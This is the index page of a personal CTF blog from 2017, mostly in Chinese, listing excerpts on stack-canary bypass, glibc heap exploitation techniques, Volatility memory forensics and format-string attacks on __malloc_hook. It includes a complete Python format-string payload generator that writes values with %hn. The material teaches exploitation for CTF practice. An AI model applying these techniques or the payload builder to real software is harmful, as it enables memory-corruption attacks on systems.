Flier's Blog

F1r


  • 首页

  • 标签

  • 分类

  • 归档

  • 站点地图

  • 搜索

Shanghai-DCTF-2017-pwn

发表于 2017-11-30 | 分类于 PWN |

Shanghai-DCTF-2017-pwn

简单分析

简单说一说

程序漏洞不少,但是因为编译时加入的保护措施,导致大多数漏洞无法利用。比赛时一直惯性思维,认为有canary的函数就不会成功利用栈溢出进行攻击。回头才发现一个点,也算是一个比较少见的知识点,可以绕过canary的防护,从而对程序流程进行控制。

阅读全文 »

Heap-Exploitation-EXP

发表于 2017-10-27 | 分类于 PWN |

Heap-Exploitation

Preview

  • Double Free
    • Making malloc return an already allocated fastchunk
  • Forging chunks
    • Making malloc return a nearly arbitrary pointer
  • Unlink Explit
    • Getting (nearly) arbitrary write access
  • OFF-BY-ONE
    • Depending on the one-byte-overflow
  • House of Spirit
    • Making malloc return a nearly arbitrary pointer
  • House of Lore
    • Making malloc return a nearly arbitrary pointer
  • House of Force
    • Making malloc return a nearly arbitrary pointer
  • House of Einherjar
    • Making malloc return a nearly arbitrary pointer
阅读全文 »

CCF2016-reverse2

发表于 2017-10-27 | 分类于 REVERSE |

CCF2016 软件破解2

分析

此处代码段有无法解析的指令

程序在输入密码后,用输入的密码作为argv[1],以原程序的path作为argv[0]开启了新的子线程

阅读全文 »

Heap-Exploitation-base-knowledge-notes

发表于 2017-10-24 | 分类于 PWN |

Heap Exploitation

Base Knowledge

malloc_chunk

1
2
3
4
5
6
7
8
9
10
11
struct malloc_chunk{
INTERNAL_SIZE_T mchunk_prev_size; /*Size of previous chunk (if free) */
INTERNAL_SIZE_T mchunk_size; /*Size in bytes, including overhead */
struct malloc_chunk* fd; /*double links ---- used only if free.*/
struct malloc_chunk* bf;
/*only used for large blocks: pointer to next larger size*/
struct malloc_chunk* fd_nextsize;
struct malloc_chunk* bk_nextsize;
}
typedef struct malloc_chunk* mchunkptr;
阅读全文 »

PLAY_WITH_LINUX_HEAP-notes

发表于 2017-10-21 | 分类于 PWN |

PLAY WITH LINUX HEAP

作者:
memeda@0ops
pwner.xu@gamil.con

BACKGROUND

  1. Linux heap become hard to exploit due to the new version of GLIBC.
    • Hundreds of thousands of assertions there.
    • ASLR and Non-eXecutable heap.
  2. Heap issues are scarce in CTF games.
    • spring up in recent games like HOTCON CTF & Hack.LU CTF.

CATALOGUE

  1. Introduction to GLIBC Heap
  2. View Heap As an Attacker
    • free()
    • malloc()
    • main_arena
    • mmap() & munmap()
  3. Examples
阅读全文 »

karspersky-helpme

发表于 2017-10-19 | 分类于 MISC |

karspersky Helpme

常规分析

查看内存快照的属性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
volatility -f ./memory.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/flier/Desktop/karspersky/helpme/memory.vmem)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82961be8L
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0x82962c00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2017-09-25 12:18:53 UTC+0000
Image local date and time : 2017-09-25 15:18:53 +0300
阅读全文 »

fmt_str write func

发表于 2017-10-16 | 分类于 PWN |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def format(writes, idx, address_string):
printed = len(address_string)
payload = ""
for where, what in sorted(writes.items(),key = lambda tmp:tmp[1]):
print where, what
to_add = (what - printed) &0xffff
if to_add > 0:
if to_add < 8:
payload += (what-printed) * 'a'
else:
payload += '%0' + str(to_add) + 'x'
payload += '%' + str(where + idx) + '$hn'
printed += to_add
return address_string + payload
writes = {}
writes[0] = (0x12345678 >> 16) & 0xffff
writes[1] = 0x12345678 & 0xffff
writes[2] = (0x12abcdef >> 16) & 0xffff
writes[3] = 0x12abcdef & 0xffff
addr_string = '\x12\x34\x56\x78' + '\x12\x34\x56\x78' + '\x12\x34\x56\x78' + '\x12\x34\x56\x78'
print format(writes, 0, addr_string)

format string overwrite __malloc_hook

发表于 2017-10-16 | 分类于 PWN |

format string & reload & __malloc_hook

When we can use format string to write our data to any address, this elf file is marked as reload. So we can’t easily write our data to got table to control the ip.

We can still control the ip by writing data to the address of __malloc_hook in glibc.

阅读全文 »

unlink

发表于 2017-10-16 | 分类于 PWN |

HEAP UNLINK ATTACK

WHAT IS UNLINK

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#define unlink(P, BK, FD) {
FD = P->fd;
BK = P->bk;
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P);
else {
FD->bk = BK;
BK->fd = FD;
if (!in_smallbin_range (P->size)
&& __builtin_expect (P->fd_nextsize != NULL, 0)) {
assert (P->fd_nextsize->bk_nextsize == P);
assert (P->bk_nextsize->fd_nextsize == P);
if (FD->fd_nextsize == NULL) {
if (P->fd_nextsize == P)
FD->fd_nextsize = FD->bk_nextsize = FD;
else {
FD->fd_nextsize = P->fd_nextsize;
FD->bk_nextsize = P->bk_nextsize;
P->fd_nextsize->bk_nextsize = FD;
P->bk_nextsize->fd_nextsize = FD;
}
} else {
P->fd_nextsize->bk_nextsize = P->bk_nextsize;
P->bk_nextsize->fd_nextsize = P->fd_nextsize;
}
}
}
}
阅读全文 »

F1r

9 日志
3 分类
7 标签
RSS
GitHub E-Mail Swing'Blog Bendawang burnegg
© 2017 F1r
由 Hexo 强力驱动
|
主题 — NexT.Pisces v5.1.3